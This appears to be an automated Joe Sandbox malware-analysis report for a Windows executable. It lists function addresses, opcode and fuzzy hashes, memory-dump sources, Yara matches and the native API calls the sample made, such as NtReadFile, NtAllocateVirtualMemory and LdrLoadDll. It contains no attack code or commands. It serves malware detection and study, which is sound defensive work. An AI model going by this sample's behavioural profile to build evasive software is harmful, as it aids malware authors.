Snapshot File: hcaresult_0_2_11cd000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd2c2478663906bd6ed67fb289fc2b06aff0d4cb38e0cf627e0b65184b68135
Instruction ID: 2f4a7fd7c00a817ae0e6d2cd7253d4c3918bca3737b8644025bc844038d54dbb
Opcode Fuzzy Hash: 0bd2c2478663906bd6ed67fb289fc2b06aff0d4cb38e0cf627e0b65184b68135
Instruction Fuzzy Hash: 90F0C871004744AEEB148A1ADC84762FFE8EF55B24F18C46AEE080B286C3799840CBB1

Non-executed Functions

Function 06F843E8 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

O5>M, xrefs: 06F846FF

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: O5>M
API String ID: 0-2302383708
Opcode ID: 3a73683b16a272df9f8e66a7135dd65cc1f12d593bea8326f75a97a45736eb5f
Instruction ID: c64713582e0577c76d3f41fcafab74b32265a74e65745f3c2d732f3b7969bfc5
Opcode Fuzzy Hash: 3a73683b16a272df9f8e66a7135dd65cc1f12d593bea8326f75a97a45736eb5f
Instruction Fuzzy Hash: 75B13874E1521ADFDB44DFA9D98089EFBF2BF89300B14D56AD829AB218D3309901CF94

Function 06F843D8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

O5>M, xrefs: 06F846FF

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: O5>M
API String ID: 0-2302383708
Opcode ID: 97c788a8c06ce5b674c14423d519011e5ce1376be508b49b60dbd7fad2e8db35
Instruction ID: d0008e0db89c50978ea6a1dbb690a1521a753b5d9ad35238beceef083ed92cb4
Opcode Fuzzy Hash: 97c788a8c06ce5b674c14423d519011e5ce1376be508b49b60dbd7fad2e8db35
Instruction Fuzzy Hash: FDB14B74E1521ADFDB44DFA9D98089EFBF2FF89300B14D56AD829AB215E3309901CF94

Function 06F81489 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

nlh_, xrefs: 06F81529

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: nlh_
API String ID: 0-3984638114
Opcode ID: 7678c899696056b5dac45dde84852e8276df3a9de4897d5d07ec2e856bf067c7
Instruction ID: 8934423c5d95012a54ecf4079a884f0c5f8fb65e759b52983bbe967c8eca3aae
Opcode Fuzzy Hash: 7678c899696056b5dac45dde84852e8276df3a9de4897d5d07ec2e856bf067c7
Instruction Fuzzy Hash: 905148B5E1520ADFDB48CFEAD4825AEFBF6BF89310F10952AD405A7254D7348A42CF90

Function 06F81498 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

nlh_, xrefs: 06F81529

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID: nlh_
API String ID: 0-3984638114
Opcode ID: 9bfe73236d7f3d0b49b18b4de87a068eed70292821d600a9b478db5c91b5686b
Instruction ID: 27e7cad96ca424c75ab882819fbf3eeaf98e3d6bac971f5c30f01b85b9dbaaf8
Opcode Fuzzy Hash: 9bfe73236d7f3d0b49b18b4de87a068eed70292821d600a9b478db5c91b5686b
Instruction Fuzzy Hash: 235136B5E1520ACFDB48CFEAD4865AEFBF6BB89310F10952AD405B7254D7348A42CF90

Function 04FE0518 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35ca9a9b163997a0f5887f804d0feff33bc4c401fff56a34ac9a568adc787f3
Instruction ID: e381f78d797f41965a3bdb9d705c7fcdf200d7f382cbc673faef9fd31c5dc9d1
Opcode Fuzzy Hash: f35ca9a9b163997a0f5887f804d0feff33bc4c401fff56a34ac9a568adc787f3
Instruction Fuzzy Hash: 4E12A5B9C81745DAF310CF65E84C1893BB1BB45318BD04A29D2612B6E9DFBC25EACF44

Function 06F8D770 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d82895df65a46dfb539b532b3af8e64f882abe316d333db6517f8b3adc6248
Instruction ID: b233d0207fc42499070d38a3dc3943fd385388c0a590d4056bb8ce5ccc54711d
Opcode Fuzzy Hash: 03d82895df65a46dfb539b532b3af8e64f882abe316d333db6517f8b3adc6248
Instruction Fuzzy Hash: ACE1F874E042198FDB14DFA9C5809AEFBB2FF89305F2481A9D414AB35AD731AD42CF61

Function 06F8B718 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13fe7622e8ebc92e885f42e3435f737dc4ea61ff64c6ce617ea89394f7f7cf31
Instruction ID: 4106373300b039a57d62e02063de2c87d71a347277385429b606c0ab1af2514d
Opcode Fuzzy Hash: 13fe7622e8ebc92e885f42e3435f737dc4ea61ff64c6ce617ea89394f7f7cf31
Instruction Fuzzy Hash: 69E10C74E002198FDB14DFA9C5809AEFBF2FF89305F2481A9D414AB35AD731A942CF61

Function 06F8B2E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a840f5c91079174ca2ca60c887d40f4e3b81160957cf91b2535bb70d04458307
Instruction ID: ae5ebe1b3a54295b2555f7d1856a08b07afa9e864844fff9577f674851685cab
Opcode Fuzzy Hash: a840f5c91079174ca2ca60c887d40f4e3b81160957cf91b2535bb70d04458307
Instruction Fuzzy Hash: 42E1F874E002198FDB54DFA9C5809AEFBF2FF89305F2481A9D414AB35AD731A942CF61

Function 06F8D260 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8e5fc2682dc246468788948d0ea4b465419ff00e3249402f32d038b40f20c3
Instruction ID: b07258002f7c024d4152ae72a1145c5bb174a06b4ad264d73bd54e5958c21af2
Opcode Fuzzy Hash: 4d8e5fc2682dc246468788948d0ea4b465419ff00e3249402f32d038b40f20c3
Instruction Fuzzy Hash: 0DE1E774E002198FDB14DFA9C5809AEFBB2FF89305F2481A9D414AB396D735AD42CF61

Function 06F8AEA8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669fd28d654eccf44533c8bc2e7677137d279ef4cb67564ef30c30eef501391e
Instruction ID: 710b376ed034a22030d46c5d16ffdaa55936e08edb6abdbeb98b5d642142c278
Opcode Fuzzy Hash: 669fd28d654eccf44533c8bc2e7677137d279ef4cb67564ef30c30eef501391e
Instruction Fuzzy Hash: 33E1FA74E002198FCB54DFA9C5809AEFBF2FF89305F2481A9D414AB356D735A942CFA1

Function 06F826A7 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6acdbe74e9fe9c637cd439a289a27facfd6fc9e40e8916916797fd9aaf0bba28
Instruction ID: 0c35ae0a34484bc87943639a2cce52ce57b77a885164ad1b2279506d3d9169d4
Opcode Fuzzy Hash: 6acdbe74e9fe9c637cd439a289a27facfd6fc9e40e8916916797fd9aaf0bba28
Instruction Fuzzy Hash: 9AD1FA36D2075A8ACB05EF64D990A9DB7B1FF95300F50C7AAD1093B224EB706AC9CB41

Function 0288E4C4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045152983.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2880000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be58a0765d5501da4365119396ed9754a40b53e43d900e70e8704e73af970c9
Instruction ID: c04515c486b7aba5417018b088d4d26b0e8f5b43d760274bfa3cacdc6d3714b9
Opcode Fuzzy Hash: 4be58a0765d5501da4365119396ed9754a40b53e43d900e70e8704e73af970c9
Instruction Fuzzy Hash: B9A16D3AE002198FCF15EFB4C94059EB7B2FF95304B15456AEA05EB265EB31E916CF40

Function 06F826B8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2811257d6ee75c23cf274964f3b4311ee78db31e81d4cede9e74ba84122ee95
Instruction ID: 39637a3575884bfe6491b9481c8b6f6477c017257363fb502c42437d847a688e
Opcode Fuzzy Hash: b2811257d6ee75c23cf274964f3b4311ee78db31e81d4cede9e74ba84122ee95
Instruction Fuzzy Hash: F5D1FA32D2075A8ACB05EF64D990A9DB7B1FF95300F50C7AAD1093B224EF706AC9CB41

Function 04FE050B Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052087516.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fe0000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38a86f502ecc6f5372b8e2c82c7411934758a4c6098e57daa75e71924d001e87
Instruction ID: 0d75beca383e0e40e571efe027fb154846400eb690ec88f7430becd3cda97634
Opcode Fuzzy Hash: 38a86f502ecc6f5372b8e2c82c7411934758a4c6098e57daa75e71924d001e87
Instruction Fuzzy Hash: 04C12AB8C817459BF710CF25E8481897BB1FB85318F904A29D2616B2E5DFBC25EACF44

Function 06F8AE91 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25eb56ec03a2bd491a7632a22f7d317c84451084118c57774caae71511a144c
Instruction ID: 79ea790570ccd71fb40f303156b9781d8d41e4dc2939fc628d7785ff078420b3
Opcode Fuzzy Hash: f25eb56ec03a2bd491a7632a22f7d317c84451084118c57774caae71511a144c
Instruction Fuzzy Hash: 53511BB4E002198FDB14DFA9C5405AEBBB2FF89304F2481AAD418A7356D7359A42CFA1

Function 06F8B70B Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ad814695bfb5f21f876515a09c8faa83301664221ce9d066f07494aea9e413
Instruction ID: 79fe1d42ee1e6df97aacbee48c39c48f2d569c893ea3e3b29163a15b1afc63fb
Opcode Fuzzy Hash: 18ad814695bfb5f21f876515a09c8faa83301664221ce9d066f07494aea9e413
Instruction Fuzzy Hash: 6E512974E042198FDB14DFA9C5805AEFBB2FF89305F24C1A9D418AB256C7359A42CFA1

Function 06F8D24F Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8c0284ef405bd07bc2f7cf9bd647183072589d25160db773a1df8d1316028f
Instruction ID: 922f1737b5c4eea606863a3c75037e1ed644188b25b5b32524e56d1d1cb50752
Opcode Fuzzy Hash: 3d8c0284ef405bd07bc2f7cf9bd647183072589d25160db773a1df8d1316028f
Instruction Fuzzy Hash: A1512A74E042198FCB14DFA9C5815AEBBF2EF89304F2481AAD418A7256D731AA42CF61

Function 06F8D761 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7847d0ff041a734a85af08dd764e80e6aaabef3e08c51dee85f0004fc2b4c39
Instruction ID: d24b6b6a28e16c8235641f7a95d0f23dd686ad17b3743022f69df8d040a8529d
Opcode Fuzzy Hash: e7847d0ff041a734a85af08dd764e80e6aaabef3e08c51dee85f0004fc2b4c39
Instruction Fuzzy Hash: 42511774E002198FDB14DFA9C5805AEFBB2FF89305F24C1A9D418AB356D7319A42CFA1

Function 06F8AE5B Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2061602939.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f80000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 136147277f1b7f75891918ab57ed6fa98f246f0beb69884b7ce12c50bd1519cd
Instruction ID: 24349a2eff27f2d7558a72064fff7bc3c25c0734256696f233ace2251a6d6bbb
Opcode Fuzzy Hash: 136147277f1b7f75891918ab57ed6fa98f246f0beb69884b7ce12c50bd1519cd
Instruction Fuzzy Hash: 595109B4E002198FCB14DFA9C5805AEFBF2FF89305F24C1AAD418A7216D7359A42CF60

Analysis Process: CZyOWoN2hiszA6d.exePID: 7256, Parent PID: 1076COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.7%
Total number of Nodes:	559
Total number of Limit Nodes:	69

Executed Functions

Function 0041A40B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455

Strings

bMA, xrefs: 0041A432, 0041A440
bMA, xrefs: 0041A44D, 0041A454
!JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
Instruction ID: ced4471a4ad639366d53666acf2a20fd0df491fb81fbb65912225195025b137a
Opcode Fuzzy Hash: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
Instruction Fuzzy Hash: 16F0C9B1200108AFCB14CF99CC85DDBB7A9EF8C354F158248B91DA7245D630E811CBA0

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455

Strings

bMA, xrefs: 0041A432, 0041A440
bMA, xrefs: 0041A44D, 0041A454
!JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
Instruction ID: d67f1bdabad64084b5c4bffe625ae792a434af5b5f697ea898bfaa5690ad8bd1
Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
Instruction Fuzzy Hash: 35015EB5E0020DABDF10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A579

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
Instruction ID: 9b4dbc26645dc4470c945089ede39bb5ce3be025d73a1c6659f34b0ab2fdb9dd
Opcode Fuzzy Hash: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
Instruction Fuzzy Hash: 70E08C76240204ABE710EB94CC85EE77B68EB48620F24845ABA5C5B242C630EA0187D0

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_CZyOWoN2hiszA6d.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Function 01AB2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2BFA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51a14333d26b3b04a597af032f454b4035dc813bf34fc8e19f2c6912427d2b23
Instruction ID: c6e52f4a1660cda19fbbb07a0f7895d66a06793564a18382b1991291720bfb20
Opcode Fuzzy Hash: 51a14333d26b3b04a597af032f454b4035dc813bf34fc8e19f2c6912427d2b23
Instruction Fuzzy Hash: 6790023120140802D180715D440464A0005A7D1701F96C019A0025654DCA1A8B5977A1

Function 01AB2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2B6A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d4a80ae7b64a108280b760e272052ac7909e7d334137b84fa70db609d094d1a
Instruction ID: 5b56ef7960b63474000114ba2bdae2aa7d92952612408385db996f935acd8190
Opcode Fuzzy Hash: 4d4a80ae7b64a108280b760e272052ac7909e7d334137b84fa70db609d094d1a
Instruction Fuzzy Hash: 82900261202400034105715D4414616400AA7E0601F56C025E1014590DC52A89916225

Function 01AB2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2ADA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e1d42da3839535f35299aa786b0ae0430920aec206072488e4be8dc78cf0e48
Instruction ID: c610f30fd02f4df919316a983282d433587e23bba274c9ad25fb9702af95290e
Opcode Fuzzy Hash: 4e1d42da3839535f35299aa786b0ae0430920aec206072488e4be8dc78cf0e48
Instruction Fuzzy Hash: 10900435311400030105F55D07045070047F7D5751757C035F1015550CD737CD715331

Function 01AB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2DFA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5463cae868329518c80124517204869e29bb67461ef66a456aa01d00a25bdc01
Instruction ID: 277b338c0739545493ec9298c19518c5afe0534cc6eeb4d61586075b8fc93b94
Opcode Fuzzy Hash: 5463cae868329518c80124517204869e29bb67461ef66a456aa01d00a25bdc01
Instruction Fuzzy Hash: C790023120140413D111715D45047070009A7D0641F96C416A0424558DD65B8A52A221

Function 01AB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2DDA

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba063b55c3e81f7b635933d4a9a1c7ee118be0e682e5c3a682c36c660b0d91a3
Instruction ID: 54ed72f79722d3d2030a01d5948f5b9531de20db4e9a136f6520dde7012fef7c
Opcode Fuzzy Hash: ba063b55c3e81f7b635933d4a9a1c7ee118be0e682e5c3a682c36c660b0d91a3
Instruction Fuzzy Hash: 42900221242441525545B15D44045074006B7E0641B96C016A1414950CC52B9956D721

Function 01AB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01AB2D3A

Memory Dump Source

Source File: 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a40000_CZyOWoN2hiszA6d.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14351cd10ce3489254c2124e149cf554ac695da7af9de613c51681a7205ff0bf
Instruction ID: 2f4368accd6c4591eb82e23467be06ef18b16630e1de895346f161e2716cf40f
Opcode Fuzzy Hash: 14351cd10ce3489254c2124e149cf554ac695da7af9de613c51681a7205ff0bf
Instruction Fuzzy Hash: 2E90043130140003D140715D541C7074005F7F1701F57D015F0414554CDD1FCD575333

